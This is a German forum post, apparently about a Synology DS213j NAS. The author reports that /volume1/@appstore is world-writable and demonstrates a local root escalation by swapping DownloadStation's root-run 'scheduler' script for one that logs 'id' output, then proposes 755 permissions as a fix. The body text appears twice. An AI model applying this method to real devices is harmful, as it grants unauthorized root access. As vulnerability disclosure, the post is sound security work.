- Mitglied seit
- 10. Jan 2014
- Beiträge
- 393
- Punkte für Reaktionen
- 0
- Punkte
- 0
Hallo,
ich habe gerade einen Beitrag gelesen, wo ein User das root Passwort nicht mehr hat, aber als admin noch ssh Zugriff hat.
Ich habe meine DS213j noch nicht so lange und wollte mal schauen, wie sicher sie denn eigentlich ist.
Dabei habe ich erschreckendes festgestellt und wollte jetzt wissen, ob das bei euch auch so ist.
/volume1/@appstore hat Permission 777, wodurch jeder User Schreibzugriff hat.
Wie man oben sehen kann habe ich das direkt ausgenutzt und das Verzeichnis der Downloadstation umbenannt und ein neues angelegt.
Warum ich das gemacht habe, sieht man in der Prozessliste:
Es gibt hier nämlich Shellscripte, die als root ausgeführt werden.
/var/packages/Downloadstation/target ist ein symbolischer Link auf /volume1/@appstore/Downloadstation
Das Script scheduler habe ich dann auch gleich ausgetauscht:
Und dann die Downloadstation neu gestartet.
Ergebnis:
Habe ich irgendwas verpasst, oder ist das bei euch auch so einfach bzw. unsicher?
Ich würde ja wenigstens /volume1/@appstore und dessen Unterverzeichnisse auf 755 setzen.
Micky
ich habe gerade einen Beitrag gelesen, wo ein User das root Passwort nicht mehr hat, aber als admin noch ssh Zugriff hat.
Ich habe meine DS213j noch nicht so lange und wollte mal schauen, wie sicher sie denn eigentlich ist.
Dabei habe ich erschreckendes festgestellt und wollte jetzt wissen, ob das bei euch auch so ist.
/volume1/@appstore hat Permission 777, wodurch jeder User Schreibzugriff hat.
Rich (BBCode):
ds> ls -la /volume1/@appstore/
drwxrwxrwx 12 root root 4096 Jan 16 20:24 .
drwxr-xr-x 24 root root 4096 Jan 16 20:17 ..
drwxrwxrwx 8 root root 4096 Jan 9 06:42 AdvancedPowerManager
drwxrwxrwx 11 root root 4096 Jan 9 06:43 AudioStation
drwxrwxrwx 10 root root 4096 Dec 5 20:44 CloudStation
drwxr-xr-x 3 root root 4096 Jan 16 20:24 DownloadStation
drwxrwxrwx 11 root root 4096 Jan 9 06:42 DownloadStation.orig
drwxrwxrwx 9 root root 4096 Nov 27 20:49 MediaServer
drwxrwxrwx 4 root root 4096 Oct 24 11:33 Perl
drwxrwxrwx 9 root root 4096 Nov 19 21:39 PhotoStation
drwxrwxrwx 10 root root 4096 Nov 27 20:50 VideoStation
Wie man oben sehen kann habe ich das direkt ausgenutzt und das Verzeichnis der Downloadstation umbenannt und ein neues angelegt.
Warum ich das gemacht habe, sieht man in der Prozessliste:
Rich (BBCode):
ds> ps | grep -i download
9208 root 3916 S /bin/sh /var/packages/DownloadStation/scripts/start-stop-status start
9220 root 3916 S /bin/sh /var/packages/DownloadStation/target/scripts/S25download.sh start
9357 root 3916 S /bin/sh /var/packages/DownloadStation/target/sbin/scheduler
Es gibt hier nämlich Shellscripte, die als root ausgeführt werden.
/var/packages/Downloadstation/target ist ein symbolischer Link auf /volume1/@appstore/Downloadstation
Das Script scheduler habe ich dann auch gleich ausgetauscht:
Rich (BBCode):
#! /bin/sh
/usr/bin/id >/usr/local/sched.txt
echo "I am root" >>/usr/local/sched.txt
sleep 6000
Und dann die Downloadstation neu gestartet.
Ergebnis:
Rich (BBCode):
ds> cat /usr/local/sched.txt
uid=0(root) gid=0(root) groups=0(root)
I am root
ds>
Habe ich irgendwas verpasst, oder ist das bei euch auch so einfach bzw. unsicher?
Ich würde ja wenigstens /volume1/@appstore und dessen Unterverzeichnisse auf 755 setzen.
Micky